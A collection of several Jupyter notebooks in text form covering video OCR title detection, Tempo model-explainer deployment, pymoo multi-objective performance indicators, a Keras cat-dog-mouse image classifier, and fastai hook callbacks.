# <figure class="video_container">
# <iframe width="100%" height="600px" name="htmlComp-iframe" scrolling="auto" sandbox="allow-same-origin allow-forms allow-popups allow-scripts allow-pointer-lock" src="https://leonardoiheme-wixsite-com.filesusr.com/html/d6f1dc_49fd03c3e444d6b22e9bd739e9c60eb8.html"></iframe>
# </figure>
# <!-- blank line -->
# + language="html"
# <!-- blank line -->
# <figure class="video_container">
# <iframe width="100%" height="600px" name="htmlComp-iframe" scrolling="auto" sandbox="allow-same-origin allow-forms allow-popups allow-scripts allow-pointer-lock" src="https://leonardoiheme-wixsite-com.filesusr.com/html/d6f1dc_a4b91ebc367c3c4fe89f58cb5f350f75.html"></iframe>
# </figure>
# <!-- blank line -->
# + language="html"
# <!-- blank line -->
# <figure class="video_container">
# <iframe width="100%" height="600px" name="htmlComp-iframe" scrolling="auto" sandbox="allow-same-origin allow-forms allow-popups allow-scripts allow-pointer-lock" src="https://leonardoiheme-wixsite-com.filesusr.com/html/d6f1dc_efc448e8403300d1f1c934b3098d0d3a.html"></iframe>
# </figure>
# <!-- blank line -->
# + language="html"
# <!-- blank line -->
# <figure class="video_container">
# <iframe width="100%" height="600px" name="htmlComp-iframe" scrolling="auto" sandbox="allow-same-origin allow-forms allow-popups allow-scripts allow-pointer-lock" src="https://leonardoiheme-wixsite-com.filesusr.com/html/d6f1dc_4eda0dbbf214fbdfd5477e5472a4e149.html"></iframe>
# </figure>
# <!-- blank line -->
# + language="html"
# <!-- blank line -->
# <figure class="video_container">
# <iframe width="100%" height="600px" name="htmlComp-iframe" scrolling="auto" sandbox="allow-same-origin allow-forms allow-popups allow-scripts allow-pointer-lock" src="https://leonardoiheme-wixsite-com.filesusr.com/html/d6f1dc_49becf2cf26923789bd4c46dad762209.html"></iframe>
# </figure>
# <!-- blank line -->
# + language="html"
# <!-- blank line -->
# <figure class="video_container">
# <iframe width="100%" height="600px" name="htmlComp-iframe" scrolling="auto" sandbox="allow-same-origin allow-forms allow-popups allow-scripts allow-pointer-lock" src="https://leonardoiheme-wixsite-com.filesusr.com/html/d6f1dc_b9cdb4cd6b3bc477a7380225601011e9.html"></iframe>
# </figure>
# <!-- blank line -->
# -
final_project/Maps.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import cv2
import os
import glob
from pytube import YouTube
#pip install fuzzywuzzy
from fuzzywuzzy import fuzz
import pytesseract
curr_url = "https://www.youtube.com/watch?v=VO5vKowfMOQ&t=7s"
# -
def extract_images_from_video(video, target_path, frequency=15, name="file", max_images=20, silent=False):
vidcap = cv2.VideoCapture(video)
frame_count = 0
time_sec = 0
num_images = 0
folder = target_path
label = 0
success = True
fps = int(vidcap.get(cv2.CAP_PROP_FPS))
    frames = []  # (file_name, time_sec) pairs for every frame written
    success, image = vidcap.read()
    while success and num_images < max_images:
        num_images += 1
        label += 1
        file_name = name + "_" + str(num_images) + ".jpg"
        frames.append((file_name, time_sec))
        path = os.path.join(folder, file_name)
        print(path)
        cv2.imwrite(path, image)
        if cv2.imread(path) is None:
            os.remove(path)
        else:
            if not silent:
                print(f'Image successfully written at {path}')
        frame_count += frequency * fps  # skip ahead `frequency` seconds of frames
        time_sec += frequency
        vidcap.set(1, frame_count)
        success, image = vidcap.read()
    return frames
# download Tesseract from https://github.com/UB-Mannheim/tesseract/wiki
pytesseract.pytesseract.tesseract_cmd = r"C:\Program Files\Tesseract-OCR\tesseract.exe"
def extract_time_titles_changed(listi,change_threshold):
wantedTimes=[]
index = 0
(file_name,time) = listi[index]
img = cv2.imread(file_name)
last_text = pytesseract.image_to_string(img)
index += 1
while index < len(listi):
(file_name,time) = listi[index]
img = cv2.imread(file_name)
text = pytesseract.image_to_string(img)
if text:
            # a low similarity to the previous frame's text means the on-screen title changed
            if fuzz.ratio(text.lower(), last_text.lower()) < change_threshold:
                wantedTimes.append(time)
index+=1
last_text = text
return wantedTimes
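# The threshold test above uses fuzzywuzzy's `fuzz.ratio`, a 0-100 similarity score. The standard library's `difflib.SequenceMatcher` gives a comparable ratio and shows how a threshold like 75 separates "same title" from "title changed" (the sample strings are made up):

```python
from difflib import SequenceMatcher

def similarity(a, b):
    # 0-100 similarity score, roughly analogous to fuzz.ratio
    return 100 * SequenceMatcher(None, a.lower(), b.lower()).ratio()

same = similarity("The Apriori Algorithm", "The Apriori algorithm")
changed = similarity("The Apriori Algorithm", "Support and Confidence")

assert same > 75      # near-identical frames score above the threshold
assert changed < 75   # a new slide title scores below it
```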
def get_time_titles_changed_with_download(video_url, target_path, wanted_frequency, fileName, change_threshold=75):
    print(video_url)
    youtube = YouTube(video_url)
    # download the YouTube video
    youtube.streams.first().download(target_path, filename=fileName)
    wanted_file_path = target_path + '/' + fileName + '.mp4'
    print(wanted_file_path)
    arr = extract_images_from_video(wanted_file_path, target_path, frequency=wanted_frequency, name=fileName, max_images=1500, silent=False)
    print(extract_time_titles_changed(arr, change_threshold))
def get_time_titles_changed(video_path, wanted_frequency, change_threshold):
    target_path = os.getcwd()
    print(target_path)
    video_name = video_path.rsplit('/', 1)[1]  # everything after the last '/' is the file name
print(video_name)
images = extract_images_from_video(video_path, target_path, frequency = wanted_frequency, name=video_name, max_images=1500, silent=True)
return extract_time_titles_changed(images, change_threshold)
# +
#get_time_titles_changed_with_download('https://www.youtube.com/watch?v=2mC1uqwEmWQ','C:/Users/sarit/Desktop/final_proj',30,'The Apriori algorithm')
# -
get_time_titles_changed('C:/Users/sarit/Desktop/final_proj/The Apriori algorithm.mp4', wanted_frequency=30, change_threshold=75)
notebooks/collect_text_changes_time.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.9.7 64-bit (''conda-tf'': conda)'
# name: python3
# ---
import tensorflow as tf
from tensorflow.keras.models import load_model
import tensorflow.keras.backend as K
tf.version.VERSION
def get_f1(y_true, y_pred): #taken from old keras source code
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
precision = true_positives / (predicted_positives + K.epsilon())
recall = true_positives / (possible_positives + K.epsilon())
f1_val = 2*(precision*recall)/(precision+recall+K.epsilon())
return f1_val
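# `get_f1` above rebuilds F1 from clipped, rounded predictions batch-wise. The same precision/recall/F1 arithmetic on a toy confusion count, in plain Python:

```python
tp, fp, fn = 8, 2, 4                        # true positives, false positives, false negatives
precision = tp / (tp + fp)                  # 0.8
recall = tp / (tp + fn)                     # 2/3
f1 = 2 * precision * recall / (precision + recall)

assert abs(precision - 0.8) < 1e-9
assert abs(recall - 2 / 3) < 1e-9
assert abs(f1 - 8 / 11) < 1e-9
```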
model = tf.keras.models.load_model("../../assets/models/conv_model_70_epochs", custom_objects={'get_f1': get_f1})
model.summary()
model.get_layer(index=0).input_shape[0][1:3]
research/src/notebooks/model_evaluation.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Model Explainer Example
#
# 
#
# In this example we will:
#
# * [Describe the project structure](#Project-Structure)
# * [Train some models](#Train-Models)
# * [Create Tempo artifacts](#Create-Tempo-Artifacts)
# * [Run unit tests](#Unit-Tests)
# * [Save python environment for our classifier](#Save-Classifier-Environment)
# * [Test Locally on Docker](#Test-Locally-on-Docker)
# * [Production on Kubernetes via Tempo](#Production-Option-1-(Deploy-to-Kubernetes-with-Tempo))
# * [Production on Kubernetes via GitOps](#Production-Option-2-(Gitops))
# ## Prerequisites
#
# This notebook needs to be run in the `tempo-examples` conda environment defined below. Create it from the project root folder:
#
# ```bash
# conda env create --name tempo-examples --file conda/tempo-examples.yaml
# ```
# ## Project Structure
# !tree -P "*.py" -I "__init__.py|__pycache__" -L 2
# ## Train Models
#
# * This section is where, as a data scientist, you do your work of training models and creating artifacts.
# * For this example we train sklearn and xgboost classification models for the iris dataset.
# +
import os
import logging
import numpy as np
import json
import tempo
from tempo.utils import logger
from src.constants import ARTIFACTS_FOLDER
logger.setLevel(logging.ERROR)
logging.basicConfig(level=logging.ERROR)
# +
from src.data import AdultData
data = AdultData()
# +
from src.model import train_model
adult_model = train_model(ARTIFACTS_FOLDER, data)
# +
from src.explainer import train_explainer
train_explainer(ARTIFACTS_FOLDER, data, adult_model)
# -
# ## Create Tempo Artifacts
#
# +
from src.tempo import create_explainer, create_adult_model
sklearn_model = create_adult_model()
Explainer = create_explainer(sklearn_model)
explainer = Explainer()
# + code_folding=[0]
# # %load src/tempo.py
import os
from typing import Any, Tuple
import dill
import numpy as np
from alibi.utils.wrappers import ArgmaxTransformer
from src.constants import ARTIFACTS_FOLDER, EXPLAINER_FOLDER, MODEL_FOLDER
from tempo.serve.metadata import ModelFramework
from tempo.serve.model import Model
from tempo.serve.pipeline import PipelineModels
from tempo.serve.utils import pipeline, predictmethod
def create_adult_model() -> Model :
sklearn_model = Model(
name="income-sklearn",
platform=ModelFramework.SKLearn,
local_folder=os.path.join(ARTIFACTS_FOLDER, MODEL_FOLDER),
uri="gs://seldon-models/test/income/model",
)
return sklearn_model
def create_explainer(model: Model) -> Tuple[Model, Any]:
@pipeline(
name="income-explainer",
uri="s3://tempo/explainer/pipeline",
local_folder=os.path.join(ARTIFACTS_FOLDER, EXPLAINER_FOLDER),
models=PipelineModels(sklearn=model),
)
class ExplainerPipeline(object):
def __init__(self):
pipeline = self.get_tempo()
models_folder = pipeline.details.local_folder
explainer_path = os.path.join(models_folder, "explainer.dill")
with open(explainer_path, "rb") as f:
self.explainer = dill.load(f)
def update_predict_fn(self, x):
if np.argmax(self.models.sklearn(x).shape) == 0:
self.explainer.predictor = self.models.sklearn
self.explainer.samplers[0].predictor = self.models.sklearn
else:
self.explainer.predictor = ArgmaxTransformer(self.models.sklearn)
self.explainer.samplers[0].predictor = ArgmaxTransformer(self.models.sklearn)
@predictmethod
def explain(self, payload: np.ndarray, parameters: dict) -> str:
print("Explain called with ", parameters)
self.update_predict_fn(payload)
explanation = self.explainer.explain(payload, **parameters)
return explanation.to_json()
#explainer = ExplainerPipeline()
#return sklearn_model, explainer
return ExplainerPipeline
# -
# ## Save Explainer
#
# !cat artifacts/explainer/conda.yaml
tempo.save(Explainer)
# ## Test Locally on Docker
#
# Here we test our models using production images but running locally on Docker. This allows us to ensure the final production image will behave as expected when deployed.
# +
from tempo.seldon import SeldonDockerRuntime
docker_runtime = SeldonDockerRuntime()
docker_runtime.deploy(explainer)
docker_runtime.wait_ready(explainer)
# -
r = json.loads(explainer(payload=data.X_test[0:1], parameters={"threshold":0.90}))
print(r["data"]["anchor"])
r = json.loads(explainer.remote(payload=data.X_test[0:1], parameters={"threshold":0.99}))
print(r["data"]["anchor"])
docker_runtime.undeploy(explainer)
# ## Production Option 1 (Deploy to Kubernetes with Tempo)
#
# * Here we illustrate how to run the final models in "production" on Kubernetes by using Tempo to deploy them
#
# ### Prerequisites
#
# Create a Kind Kubernetes cluster, with MinIO and Seldon Core installed, using the Tempo project's Ansible playbook:
#
# ```
# ansible-playbook ansible/playbooks/default.yaml
# ```
# !kubectl apply -f k8s/rbac -n production
from tempo.examples.minio import create_minio_rclone
import os
create_minio_rclone(os.getcwd()+"/rclone-minio.conf")
tempo.upload(sklearn_model)
tempo.upload(explainer)
# +
from tempo.serve.metadata import RuntimeOptions, KubernetesOptions
runtime_options = RuntimeOptions(
k8s_options=KubernetesOptions(
namespace="production",
authSecretName="minio-secret"
)
)
# +
from tempo.seldon.k8s import SeldonKubernetesRuntime
k8s_runtime = SeldonKubernetesRuntime(runtime_options)
k8s_runtime.deploy(explainer)
k8s_runtime.wait_ready(explainer)
# -
r = json.loads(explainer.remote(payload=data.X_test[0:1], parameters={"threshold":0.95}))
print(r["data"]["anchor"])
k8s_runtime.undeploy(explainer)
# ## Production Option 2 (Gitops)
#
# * We create yaml to provide to our DevOps team to deploy to a production cluster
# * We add Kustomize patches to modify the base Kubernetes yaml created by Tempo
# +
from tempo.seldon.k8s import SeldonKubernetesRuntime
k8s_runtime = SeldonKubernetesRuntime(runtime_options)
yaml_str = k8s_runtime.to_k8s_yaml(explainer)
with open(os.getcwd()+"/k8s/tempo.yaml","w") as f:
f.write(yaml_str)
# -
# !kustomize build k8s
|
docs/examples/explainer/README.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + raw_mimetype="text/restructuredtext" active=""
# .. _nb_performance_indicator:
# -
# ## Performance Indicator
# Measuring performance is fundamental for any algorithm. In a multi-objective scenario, we cannot calculate the distance to the true global optimum but must consider a set of solutions. Moreover, sometimes the optimum is not even known, and other techniques must be used.
#
# First, let us consider a scenario where the Pareto-front is known:
# + code="usage_performance_indicator.py" section="load_data"
import numpy as np
from pymoo.factory import get_problem
from pymoo.visualization.scatter import Scatter
# The pareto front of a scaled zdt1 problem
pf = get_problem("zdt1").pareto_front()
# The result found by an algorithm
A = pf[::10] * 1.1
# plot the result
Scatter(legend=True).add(pf, label="Pareto-front").add(A, label="Result").show()
# + raw_mimetype="text/restructuredtext" active=""
# .. _nb_gd:
# -
# ### Generational Distance (GD)
#
# The GD performance indicator <cite data-cite="gd"></cite> measures the distance from the solutions to the Pareto-front. Let us assume the points found by our algorithm are the objective vector set $A=\{a_1, a_2, \ldots, a_{|A|}\}$ and the reference point set (Pareto-front) is $Z=\{z_1, z_2, \ldots, z_{|Z|}\}$. Then,
#
# \begin{align}
# \begin{split}
# \text{GD}(A) & = & \; \frac{1}{|A|} \; \bigg( \sum_{i=1}^{|A|} d_i^p \bigg)^{1/p}\\[2mm]
# \end{split}
# \end{align}
#
# where $d_i$ represents the Euclidean distance ($p=2$) from $a_i$ to its nearest reference point in $Z$. Basically, this results in the average distance from any point in $A$ to the closest point in the Pareto-front.
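# The GD formula can also be sketched from scratch in NumPy for intuition (a minimal illustration, not the pymoo implementation; the small point sets `A` and `Z` below are made up):

```python
import numpy as np

def gd(A, Z, p=2):
    """Generational Distance: distance from each point in A to its
    nearest reference point in Z, aggregated as in the formula above."""
    # pairwise Euclidean distances, shape (|A|, |Z|)
    d = np.linalg.norm(A[:, None, :] - Z[None, :, :], axis=-1)
    d_min = d.min(axis=1)  # nearest reference point for each a_i
    return (d_min ** p).sum() ** (1 / p) / len(A)

A = np.array([[0.1, 1.1], [0.6, 0.6]])
Z = np.array([[0.0, 1.0], [0.5, 0.5], [1.0, 0.0]])
print(gd(A, Z))
```

# Here both solutions lie a distance of $\sqrt{0.02}$ from their nearest reference point, giving a GD of 0.1.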
# + code="usage_performance_indicator.py" section="gd"
from pymoo.factory import get_performance_indicator
gd = get_performance_indicator("gd", pf)
print("GD", gd.calc(A))
# + raw_mimetype="text/restructuredtext" active=""
# .. _nb_gd_plus:
# -
# ### Generational Distance Plus (GD+)
#
# Ishibuchi et al. proposed GD+ in <cite data-cite="igd_plus"></cite>:
#
# \begin{align}
# \begin{split}
# \text{GD}^+(A) & = & \; \frac{1}{|A|} \; \bigg( \sum_{i=1}^{|A|} {d_i^{+}}^2 \bigg)^{1/2}\\[2mm]
# \end{split}
# \end{align}
#
# where for minimization $d_i^{+} = \max \{ a_i - z_i, 0\}$ represents the modified distance from $a_i$ to its nearest reference point in $Z$ with the corresponding value $z_i$.
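# The modified distance only counts the components in which $a_i$ is worse than $z_i$. A from-scratch sketch for intuition only (not the pymoo implementation; the point sets are made up):

```python
import numpy as np

def gd_plus(A, Z):
    """GD+ with the modified distance d+ = ||max(a - z, 0)||: only the
    components where a_i is worse than z_i (for minimization) contribute."""
    diff = np.maximum(A[:, None, :] - Z[None, :, :], 0)  # (|A|, |Z|, n_obj)
    d_plus = np.linalg.norm(diff, axis=-1)               # (|A|, |Z|)
    d_min = d_plus.min(axis=1)                           # nearest z for each a_i
    return np.sqrt((d_min ** 2).sum()) / len(A)

A = np.array([[0.4, 0.6], [0.9, 0.2]])
Z = np.array([[0.0, 1.0], [0.5, 0.5], [1.0, 0.0]])
print(gd_plus(A, Z))
```

# Components where $a_i$ is already better than $z_i$ are clipped to zero, so GD+ never penalizes a solution for beating its reference point in some objective.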
# + code="usage_performance_indicator.py" section="gd_plus"
from pymoo.factory import get_performance_indicator
gd_plus = get_performance_indicator("gd+", pf)
print("GD+", gd_plus.calc(A))
# + raw_mimetype="text/restructuredtext" active=""
# .. _nb_igd:
# -
# ### Inverted Generational Distance (IGD)
#
# The IGD performance indicator <cite data-cite="igd"></cite> inverts the generational distance and measures the distance from any point in $Z$ to the closest point in $A$.
#
# \begin{align}
# \begin{split}
# \text{IGD}(A) & = & \; \frac{1}{|Z|} \; \bigg( \sum_{i=1}^{|Z|} \hat{d_i}^p \bigg)^{1/p}\\[2mm]
# \end{split}
# \end{align}
#
# where $\hat{d_i}$ represents the Euclidean distance ($p=2$) from $z_i$ to its nearest point in $A$.
#
# + code="usage_performance_indicator.py" section="igd"
from pymoo.factory import get_performance_indicator
igd = get_performance_indicator("igd", pf)
print("IGD", igd.calc(A))
# + raw_mimetype="text/restructuredtext" active=""
# .. _nb_igd_plus:
# -
# ### Inverted Generational Distance Plus (IGD+)
#
# In <cite data-cite="igd_plus"></cite> Ishibuchi et al. proposed IGD+, which is weakly Pareto compliant, whereas the original IGD is not.
#
# \begin{align}
# \begin{split}
# \text{IGD}^{+}(A) & = & \; \frac{1}{|Z|} \; \bigg( \sum_{i=1}^{|Z|} {d_i^{+}}^2 \bigg)^{1/2}\\[2mm]
# \end{split}
# \end{align}
#
# where for minimization $d_i^{+} = \max \{ a_i - z_i, 0\}$ represents the modified distance from $z_i$ to the closest solution in $A$ with the corresponding value $a_i$.
#
# + code="usage_performance_indicator.py" section="igd_plus"
from pymoo.factory import get_performance_indicator
igd_plus = get_performance_indicator("igd+", pf)
print("IGD+", igd_plus.calc(A))
# + raw_mimetype="text/restructuredtext" active=""
# .. _nb_hv:
# -
# ### Hypervolume
# For all performance indicators shown so far, a target set needs to be known. For the hypervolume, only a reference point needs to be provided. Note that we are using the hypervolume implementation from [DEAP](https://deap.readthedocs.io/en/master/). It calculates the area/volume dominated by the provided set of solutions with respect to a reference point.
# <div style="display: block;margin-left: auto;margin-right: auto;width: 40%;">
# 
# </div>
# This image is taken from <cite data-cite="hv"></cite> and illustrates a two objective example where the area which is dominated by a set of points is shown in grey.
# Whereas for the other metrics the goal was to minimize the distance to the Pareto-front, here we desire to maximize the performance metric.
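# For the two-objective minimization case, the dominated area can be computed with a simple sweep. Below is a from-scratch sketch for intuition only (not the DEAP implementation; it assumes every point is better than the reference point in both objectives):

```python
import numpy as np

def hypervolume_2d(points, ref):
    """Area dominated by `points` (2-objective minimization) up to `ref`:
    sweep the points by ascending f1 and sum the uncovered rectangles."""
    pts = points[np.argsort(points[:, 0])]
    hv, prev_f2 = 0.0, ref[1]
    for f1, f2 in pts:
        if f2 < prev_f2:  # dominated points add no new area
            hv += (ref[0] - f1) * (prev_f2 - f2)
            prev_f2 = f2
    return hv

A = np.array([[0.2, 0.8], [0.5, 0.5], [0.8, 0.2]])
print(hypervolume_2d(A, ref=np.array([1.2, 1.2])))
```

# For more than two objectives this simple sweep no longer works, which is why dedicated implementations such as DEAP's are used.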
# + code="usage_performance_indicator.py" section="hv"
from pymoo.factory import get_performance_indicator
hv = get_performance_indicator("hv", ref_point=np.array([1.2, 1.2]))
print("hv", hv.calc(A))
|
doc/source/misc/performance_indicator.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Cat-Dog-Mouse Classifier
#
# This project is a hybrid of a multi-class classification tutorial and a binary classification project.
#
# Multi-class classification tutorial: https://stackabuse.com/creating-a-neural-network-from-scratch-in-python-multi-class-classification/
# Binary classification project: https://github.com/ardamavi/Dog-Cat-Classifier
#
# The jupyter notebook used as a template and some content was borrowed from https://www.coursera.org/learn/neural-networks-deep-learning/
#
#
# ## 1 - Packages
# Let's first import all the packages that we will need during this project.
# - [os](https://docs.python.org/3/library/os.html) contains functions for interacting with the operating system.
# - [sys](https://docs.python.org/3/library/sys.html) provides access to system-specific parameters and functions.
# - [time](https://docs.python.org/3/library/time.html) provides various time-related functions.
# - [keras](https://keras.io) is a deep learning library and neural networks API.
# - [numpy](https://www.numpy.org/) is the fundamental package for scientific computing with Python.
# - [h5py](http://www.h5py.org) is a common package to interact with a dataset that is stored on an H5 file.
# - [matplotlib](http://matplotlib.org) is a library to plot graphs in Python. Some parameters are defined here.
# - [scipy](https://www.scipy.org/) and [PIL](http://www.pythonware.com/products/pil/) are used here to test your model with your own picture at the end.
# - [skimage](https://scikit-image.org/) is used for image processing.
# - [sklearn](https://scikit-learn.org/) is a machine learning library.
# - [pydot](https://pypi.org/project/pydot/) and [graphviz](https://graphviz.org/) are used for plotting the model.
#
#
# - *%autosave 0* is used to disable jupyter's autosave feature.
# - *%autoreload 2* is used to auto-reload modules.
# - *np.random.seed(1)* is used to keep all the random function calls consistent.
#
# +
import os
import sys
import time
import keras
import numpy as np
import h5py
import matplotlib.pyplot as plt
import scipy
import skimage
import pydot
import graphviz
from PIL import Image
from scipy import ndimage
from skimage import io
from sklearn.model_selection import train_test_split
# %matplotlib inline
plt.rcParams['figure.figsize'] = (5.0, 4.0) # set default size of plots
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'
# %load_ext autoreload
# %autoreload 2
# %autosave 0
np.random.seed(1)
# -
# ## 2 - Dataset
#
# The get_dataset() function and its get_img() helper function are used to load images from the ./Data/Train_Data/ directory and create numpy arrays X and Y in ./Data/npy_train_data/ containing the image data and one-hot-encoded labels, respectively.
# The train_test_split function from sklearn.model_selection is used to split the numpy arrays into random train and test subsets.
#
#
# +
def get_img(data_path):
# Getting image array from path:
img_size = 64
img = Image.open(data_path)
img = img.resize((img_size, img_size))
img = np.array(img)
return img
def get_dataset(dataset_path='Data/Train_Data'):
# Getting all data from data path:
try:
X = np.load('Data/npy_train_data/X.npy')
Y = np.load('Data/npy_train_data/Y.npy')
except FileNotFoundError:
labels = sorted(os.listdir(dataset_path)) # Getting labels
print('Categories:\n', labels)
len_datas = 0
for label in labels:
len_datas += len(os.listdir(dataset_path+'/'+label))
X = np.zeros((len_datas, 64, 64, 3), dtype='float64')
Y = np.zeros(len_datas)
count_data = 0
count_categori = [-1,''] # For encoding labels
for label in labels:
print('Loading ' + label + ' data...')
datas_path = dataset_path+'/'+label
for data in os.listdir(datas_path):
img = get_img(datas_path+'/'+data)
X[count_data] = img
# For encoding labels:
if label != count_categori[1]:
count_categori[0] += 1
count_categori[1] = label
Y[count_data] = count_categori[0]
count_data += 1
# Create dataset:
Y = keras.utils.to_categorical(Y)
if not os.path.exists('Data/npy_train_data/'):
os.makedirs('Data/npy_train_data/')
np.save('Data/npy_train_data/X.npy', X)
np.save('Data/npy_train_data/Y.npy', Y)
X /= 255.
X, X_test, Y, Y_test = train_test_split(X, Y, test_size=0.1, random_state=42, shuffle=True)
print("Dataset loaded.")
return X, X_test, Y, Y_test
# +
##### Run the code in this cell to import the data
X, X_test, Y, Y_test = get_dataset()
# -
# ## 3 - Model
#
# The get_model() function and its save_model() helper function create the model using the Keras Sequential model API (https://keras.io/models/sequential/) and save the model and weights in ./Data/Model/ as json and HDF5, respectively.
#
#
# +
def save_model(model):
if not os.path.exists('Data/Model/'):
os.makedirs('Data/Model/')
model_json = model.to_json()
with open("Data/Model/model.json", "w") as model_file:
model_file.write(model_json)
# serialize weights to HDF5
model.save_weights("Data/Model/weights.h5")
print('Model and weights saved.')
return
def get_model(num_classes=3):
model = keras.models.Sequential()
model.add(keras.layers.Conv2D(32, (3, 3), input_shape=(64, 64, 3)))
model.add(keras.layers.Activation('relu'))
model.add(keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(keras.layers.Conv2D(32, (3, 3)))
model.add(keras.layers.Activation('relu'))
model.add(keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(keras.layers.Conv2D(64, (3, 3)))
model.add(keras.layers.Activation('relu'))
model.add(keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(keras.layers.Conv2D(64, (3, 3)))
model.add(keras.layers.Activation('relu'))
model.add(keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(keras.layers.Flatten())
model.add(keras.layers.Dense(64))
model.add(keras.layers.Activation('relu'))
model.add(keras.layers.Dropout(0.5))
model.add(keras.layers.Dense(num_classes))
model.add(keras.layers.Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adadelta', metrics=['accuracy'])
print(model.summary())
return model
# +
##### Run the code in this cell to generate the model and save it and the weights.
model = get_model(len(Y[0]))
save_model(model)
# -
# ## 4 - Train
#
# The train_model() function takes the model generated by the get_model() and save_model() functions, trains it on the training data, and runs validation against the test data that were loaded and split in the get_dataset() function.
#
#
# +
def train_model(model, X, X_test, Y, Y_test):
checkpoints = []
if not os.path.exists('Data/Checkpoints/'):
os.makedirs('Data/Checkpoints/')
checkpoints.append(keras.callbacks.ModelCheckpoint('Data/Checkpoints/best_weights.h5', monitor='val_loss', verbose=0, save_best_only=True, save_weights_only=True, mode='auto', period=1))
checkpoints.append(keras.callbacks.TensorBoard(log_dir='Data/Checkpoints/./logs', histogram_freq=0, write_graph=True, write_images=False, embeddings_freq=0, embeddings_layer_names=None, embeddings_metadata=None))
# Creates live data:
# Data augmentation improves generalization, at the cost of a longer training time.
# If you don't want augmentation, use this instead:
#model.fit(X, Y, batch_size=10, epochs=25, validation_data=(X_test, Y_test), shuffle=True, callbacks=checkpoints)
generated_data = keras.preprocessing.image.ImageDataGenerator(featurewise_center=False, samplewise_center=False, featurewise_std_normalization=False, samplewise_std_normalization=False, zca_whitening=False, rotation_range=0, width_shift_range=0.1, height_shift_range=0.1, horizontal_flip = True, vertical_flip = False)
generated_data.fit(X)
model.fit_generator(generated_data.flow(X, Y, batch_size=8), steps_per_epoch=X.shape[0]//8, epochs=64, validation_data=(X_test, Y_test), callbacks=checkpoints, shuffle=True)
return model
# +
model = train_model(model, X, X_test, Y, Y_test)
save_model(model)
# -
# ## 5 - Predict
#
# The predict() function uses the saved model's predict method to generate an output prediction for a sample image.
# +
def predict(model, img_array):
prediction = model.predict(img_array)
prediction = np.argmax(prediction, axis=1)
if prediction[0] == 0:
prediction = 'cat'
elif prediction[0] == 1:
prediction = 'dog'
elif prediction[0] == 2:
prediction = 'mouse'
return prediction
# -
# ## 6 - Test with your own image
#
# You can use your own image and see the output of your model. To do that:
# 1. Add your image to this Jupyter Notebook's directory, in the "images" folder.
# 2. Change your image's name in the following code.
# 3. Run the code and check if the algorithm is right (0 = cat, 1 = dog, 2 = mouse)!
#
#
# +
img_name = "test_dog.jpg" # change this to the name of your image file
img_dir = "images/" + img_name
img = get_img(img_dir)
img_array = np.zeros((1, 64, 64, 3), dtype='float64')
img_array[0] = img
# Getting model:
model_file = open('Data/Model/model.json', 'r')
model = model_file.read()
model_file.close()
model = keras.models.model_from_json(model)
# Getting weights
model.load_weights("Data/Model/weights.h5")
prediction = predict(model, img_array)
print('It is a ' + prediction + '!')
|
cat-dog-mouse-classifier.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Hook callbacks
# This provides both a standalone class and a callback for registering and automatically deregistering [PyTorch hooks](https://pytorch.org/tutorials/beginner/former_torchies/nn_tutorial.html#forward-and-backward-function-hooks), along with some pre-defined hooks. Hooks can be attached to any [`nn.Module`](https://pytorch.org/docs/stable/nn.html#torch.nn.Module), for either the forward or the backward pass.
#
# We'll start by looking at the pre-defined hook [`ActivationStats`](/callbacks.hooks.html#ActivationStats), then we'll see how to create our own.
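# Under the hood these helpers build on PyTorch's own hook registration. A bare-bones sketch of the mechanism (using a made-up two-layer model, independent of fastai):

```python
import torch
import torch.nn as nn

# a made-up model for illustration
model = nn.Sequential(nn.Linear(4, 8), nn.ReLU(), nn.Linear(8, 2))

stored = {}

def store_output(module, inputs, output):
    # runs after every forward pass of the hooked module
    stored['act'] = output.detach()

handle = model[0].register_forward_hook(store_output)  # hook the first layer
_ = model(torch.randn(3, 4))
handle.remove()  # always deregister, or the hook keeps firing

print(stored['act'].shape)  # activations of the first Linear layer
```

# The `Hook` class below automates this register/remove dance and places the hook function's result in `self.stored`.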
# + hide_input=true
from fastai.gen_doc.nbdoc import *
from fastai.callbacks.hooks import *
from fastai import *
from fastai.train import *
from fastai.vision import *
# + hide_input=true
show_doc(ActivationStats)
# -
# [`ActivationStats`](/callbacks.hooks.html#ActivationStats) saves the layer activations in `self.stats` for all `modules` passed to it. By default it will save activations for *all* modules. For instance:
path = untar_data(URLs.MNIST_SAMPLE)
data = ImageDataBunch.from_folder(path)
learn = create_cnn(data, models.resnet18, callback_fns=ActivationStats)
learn.fit(1)
# The saved `stats` is a `FloatTensor` of shape `(2,num_modules,num_batches)`. The first axis is `(mean,stdev)`.
len(learn.data.train_dl),len(learn.activation_stats.modules)
learn.activation_stats.stats.shape
# So this shows the standard deviation (`axis0==1`) of the 5th-last layer (`axis1==-5`) for each batch (`axis2`):
plt.plot(learn.activation_stats.stats[1][-5].numpy());
# + hide_input=true
show_doc(Hook)
# -
